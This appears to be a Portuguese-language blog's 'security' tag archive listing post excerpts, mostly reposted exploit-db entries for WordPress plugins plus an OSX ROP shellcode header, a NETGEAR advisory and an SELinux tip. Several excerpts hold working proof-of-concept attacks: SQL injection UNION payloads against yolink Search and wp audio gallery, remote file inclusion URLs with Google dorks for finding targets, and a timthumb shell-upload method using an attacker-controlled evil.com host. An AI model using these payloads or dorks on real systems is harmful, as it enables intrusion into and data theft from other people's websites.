Browsed by
Tag: security

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Depois de instalar tudo em seu servidor Centos (falo de ambiente lamp2 no centos), ao instalar o ioncube você percebe a mensagem de erro: Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied Calma, nem você é do mal e nem seu servidor, isso ocorre por que o SELinux está monitorando as coisas, permissões e etc, teremos de desativar o danado :(, Para desativarmos o SELINUX devemos seguir os passos abaixo: vim

Read More Read More

Segurança da Informação

Segurança da Informação

Segurança da Informação (parte 1) – Conceitos Mod NUB 1   Intitulo “mod nub 1” a este artigo pois o considero extremamente básico para quem está querendo se aprofundar em um assunto, que na verdade é um mundo (e olhe que não é novo) vasto, não completamente desvendado e ainda um ramo cujo grau de conhecimento é levado ao extremo e requer superação mais que diária. (complicado de entender, não?… NÃO!) Novamente não justifico o termo nub 1 para pessoas que…

Read More Read More

OSX universal ROP shellcode Testado no SNOW LEOPARD

OSX universal ROP shellcode Testado no SNOW LEOPARD

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want to test: ; – uncomment lea rsp, [rel rop_stage0] / ret ; – make ; – nc -l 4444 ; – ./sc ; – you…

Read More Read More

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

Sense of Security – Security Advisory – SOS-11-011 Release Date. 20-Sep-2011 Last Update. – Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 (by contacting NETGEAR) CVE reference. Not yet assigned Details. The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by ISP’s as customer premises equipment within…

Read More Read More

Multiple WordPress Plugin timthumb.php Vulnerabilites

Multiple WordPress Plugin timthumb.php Vulnerabilites

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com and then providing it to the script through the src GET parameter, it is possible to upload a shell and execute arbitrary code on the…

Read More Read More

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/dbunixwp_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup and function access define(‘dbunixwp_USE_THEMES’, false); require_once(urldecode($_GET[‘abspath’]).’/wp-load.php’); // save us looking for it, it’s passed as a GET parameter Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/dbunixwp_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { // Create WordPress environmnt require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’); // Handle attachment WPMiniMail::wpmm_upload(); } Fonte: http://www.exploit-db.com/exploits/17868/

WordPress yolink Search plugin <= 1.1.4 SQL Injection

WordPress yolink Search plugin <= 1.1.4 SQL Injection

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size...

Read More Read More

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection

# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix . “posts”; … if (isset($_GET[‘post_gallery’])) $query = ‘SELECT * FROM ‘.$table_name.’ WHERE post_parent = \”.$_GET[‘post_gallery’].’\’ AND post_mime_type = \’audio/mpeg\’ ORDER BY menu_order ASC’; Fonte: http://www.exploit-db.com/exploits/17756/

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Como conectar no Mac os X Snow leopard | Lion via Remote Desktop

Bom, galera, nós do 4ppun1x conectamos remotamente neste bsd maravilhoso que é o mac afim de que pudéssemos fazer ajustes remotos em nosso pc. Este how to resume-se em habilitar o suporte VNC do mac juntamente com uma senha de segurança para que nosso mac fique tranquilo e seguro para aceitar conexões de rede sem qualquer stress. Estamos usando o mac os x Snow Leopard (mas funciona no mac os x lion), assim como uma conexão comum (feita de um…

Read More Read More